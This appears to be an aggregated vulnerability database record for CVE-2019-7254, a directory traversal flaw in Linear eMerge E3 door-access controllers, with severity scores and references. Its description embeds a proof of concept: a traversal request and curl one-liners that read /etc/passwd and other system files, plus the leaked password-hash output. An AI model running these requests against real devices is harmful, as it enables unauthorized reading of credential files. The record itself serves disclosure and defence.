ID

VAR-201907-0155


CVE

CVE-2019-7254


TITLE

Linear eMerge E3  Vulnerabilities related to authorization, privileges, and access control in series devices

Trust: 0.8

sources: JVNDB: JVNDB-2019-006012

DESCRIPTION

Linear eMerge E3-Series devices allow File Inclusion. Linear eMerge E3 Series devices contain vulnerabilities related to authorization, privileges, and access control.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. A security vulnerability exists in Nortek Security & Control Linear eMerge E3-Series. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements. Linear eMerge E3 Unauthenticated Directory Traversal File Disclosure Affected version: <=1.00-06 CVE: CVE-2019-7254 Advisory: https://applied-risk.com/resources/ar-2019-005 by Gjoko 'LiquidWorm' Krstic GET /?c=../../../../../../etc/passwd%00 Host: 192.168.1.2 root:$1$VVtYRWvv$gyIQsOnvSv53KQwzEfZpJ0:0:100:root:/root:/bin/sh bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail: news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp: operator:x:11:0:operator:/root: games:x:12:100:games:/usr/games: gopher:x:13:30:gopher:/usr/lib/gopher-data: ftp:x:14:50:FTP User:/home/ftp: nobody:x:99:99:Nobody:/home/default: e3user:$1$vR6H2PUd$52r03jiYrM6m5Bff03yT0/:1000:1000:Linux User,,,:/home/e3user:/bin/sh lighttpd:$1$vqbixaUx$id5O6Pnoi5/fXQzE484CP1:1001:1000:Linux User,,,:/home/lighttpd:/bin/sh curl -s http://192.168.1.3/badging/badge_print_v0.php?tpl=../../../../../etc/passwd curl -s http://192.168.1.2/badging/badge_template_print.php?tpl=../../../../../etc/version curl -s http://192.168.1.2/badging/badge_template_v0.php?layout=../../../../../../../etc/issue curl -s http://192.168.1.2/?c=../../../../../../etc/passwd%00

Trust: 1.89

sources: NVD: CVE-2019-7254 // JVNDB: JVNDB-2019-006012 // VULHUB: VHN-158689 // VULMON: CVE-2019-7254 // PACKETSTORM: 155252

AFFECTED PRODUCTS

vendor:nortekcontrolmodel:linear emerge essentialscope:lteversion:1.00-06

Trust: 1.0

vendor:nortekcontrolmodel:linear emerge elitescope:lteversion:1.00-06

Trust: 1.0

vendor:nortekmodel:linear emerge elitescope: - version: -

Trust: 0.8

vendor:nortekmodel:linear emerge essentialscope: - version: -

Trust: 0.8

sources: JVNDB: JVNDB-2019-006012 // NVD: CVE-2019-7254

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2019-7254
value: HIGH

Trust: 1.0

NVD: CVE-2019-7254
value: HIGH

Trust: 0.8

CNNVD: CNNVD-201907-114
value: HIGH

Trust: 0.6

VULHUB: VHN-158689
value: HIGH

Trust: 0.1

VULMON: CVE-2019-7254
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2019-7254
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.1

NVD: CVE-2019-7254
severity: HIGH
baseScore: 9.0
vectorString: AV:N/AC:L/AU:S/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: NONE
impactScore: NONE
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.8

VULHUB: VHN-158689
severity: HIGH
baseScore: 9.0
vectorString: AV:N/AC:L/AU:S/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 8.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2019-7254
baseSeverity: HIGH
baseScore: 7.5
vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 3.9
impactScore: 3.6
version: 3.1

Trust: 1.0

NVD: CVE-2019-7254
baseSeverity: HIGH
baseScore: 8.8
vectorString: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: LOW
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

sources: VULHUB: VHN-158689 // VULMON: CVE-2019-7254 // JVNDB: JVNDB-2019-006012 // CNNVD: CNNVD-201907-114 // NVD: CVE-2019-7254

PROBLEMTYPE DATA

problemtype:CWE-22

Trust: 1.1

problemtype:Authorization / authority / access control (CWE-264) [NVD evaluation ]

Trust: 0.8

problemtype:CWE-264

Trust: 0.1

sources: VULHUB: VHN-158689 // JVNDB: JVNDB-2019-006012 // NVD: CVE-2019-7254

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201907-114

TYPE

path traversal

Trust: 0.6

sources: CNNVD: CNNVD-201907-114

PATCH

title:Top Pageurl:https://www.nortekcontrol.com/

Trust: 0.8

title:Kenzer Templates [5170] [DEPRECATED]url:https://github.com/ARPSyndicate/kenzer-templates

Trust: 0.1

sources: VULMON: CVE-2019-7254 // JVNDB: JVNDB-2019-006012

EXTERNAL IDS

db:NVDid:CVE-2019-7254

Trust: 3.5

db:PACKETSTORMid:155252

Trust: 1.9

db:ICS CERTid:ICSA-24-065-01

Trust: 0.8

db:JVNid:JVNVU96911165

Trust: 0.8

db:JVNDBid:JVNDB-2019-006012

Trust: 0.8

db:CNNVDid:CNNVD-201907-114

Trust: 0.7

db:EXPLOIT-DBid:47618

Trust: 0.6

db:VULHUBid:VHN-158689

Trust: 0.1

db:VULMONid:CVE-2019-7254

Trust: 0.1

sources: VULHUB: VHN-158689 // VULMON: CVE-2019-7254 // JVNDB: JVNDB-2019-006012 // PACKETSTORM: 155252 // CNNVD: CNNVD-201907-114 // NVD: CVE-2019-7254

REFERENCES

url:https://www.applied-risk.com/resources/ar-2019-005

Trust: 2.6

url:http://packetstormsecurity.com/files/155252/linear-emerge-e3-1.00-06-directory-traversal.html

Trust: 1.9

url:https://applied-risk.com/labs/advisories

Trust: 1.8

url:https://nvd.nist.gov/vuln/detail/cve-2019-7254

Trust: 1.5

url:https://jvn.jp/vu/jvnvu96911165/

Trust: 0.8

url:https://www.cisa.gov/news-events/ics-advisories/icsa-24-065-01

Trust: 0.8

url:https://www.exploit-db.com/exploits/47618

Trust: 0.6

url:https://cwe.mitre.org/data/definitions/22.html

Trust: 0.1

url:https://nvd.nist.gov

Trust: 0.1

url:https://github.com/arpsyndicate/kenzer-templates

Trust: 0.1

url:http://192.168.1.3/badging/badge_print_v0.php?tpl=../../../../../etc/passwd

Trust: 0.1

url:http://192.168.1.2/?c=../../../../../../etc/passwd%00

Trust: 0.1

url:https://applied-risk.com/resources/ar-2019-005

Trust: 0.1

url:http://192.168.1.2/badging/badge_template_print.php?tpl=../../../../../etc/version

Trust: 0.1

url:http://192.168.1.2/badging/badge_template_v0.php?layout=../../../../../../../etc/issue

Trust: 0.1

sources: VULHUB: VHN-158689 // VULMON: CVE-2019-7254 // JVNDB: JVNDB-2019-006012 // PACKETSTORM: 155252 // CNNVD: CNNVD-201907-114 // NVD: CVE-2019-7254

CREDITS

LiquidWorm

Trust: 0.7

sources: PACKETSTORM: 155252 // CNNVD: CNNVD-201907-114

SOURCES

db:VULHUBid:VHN-158689
db:VULMONid:CVE-2019-7254
db:JVNDBid:JVNDB-2019-006012
db:PACKETSTORMid:155252
db:CNNVDid:CNNVD-201907-114
db:NVDid:CVE-2019-7254

LAST UPDATE DATE

2024-08-14T13:55:18.500000+00:00


SOURCES UPDATE DATE

db:VULHUBid:VHN-158689date:2020-08-24T00:00:00
db:VULMONid:CVE-2019-7254date:2021-10-04T00:00:00
db:JVNDBid:JVNDB-2019-006012date:2024-03-07T07:18:00
db:CNNVDid:CNNVD-201907-114date:2021-10-08T00:00:00
db:NVDid:CVE-2019-7254date:2021-10-04T17:15:57.257

SOURCES RELEASE DATE

db:VULHUBid:VHN-158689date:2019-07-02T00:00:00
db:VULMONid:CVE-2019-7254date:2019-07-02T00:00:00
db:JVNDBid:JVNDB-2019-006012date:2019-07-08T00:00:00
db:PACKETSTORMid:155252date:2019-11-12T17:07:24
db:CNNVDid:CNNVD-201907-114date:2019-07-02T00:00:00
db:NVDid:CVE-2019-7254date:2019-07-02T19:15:11.007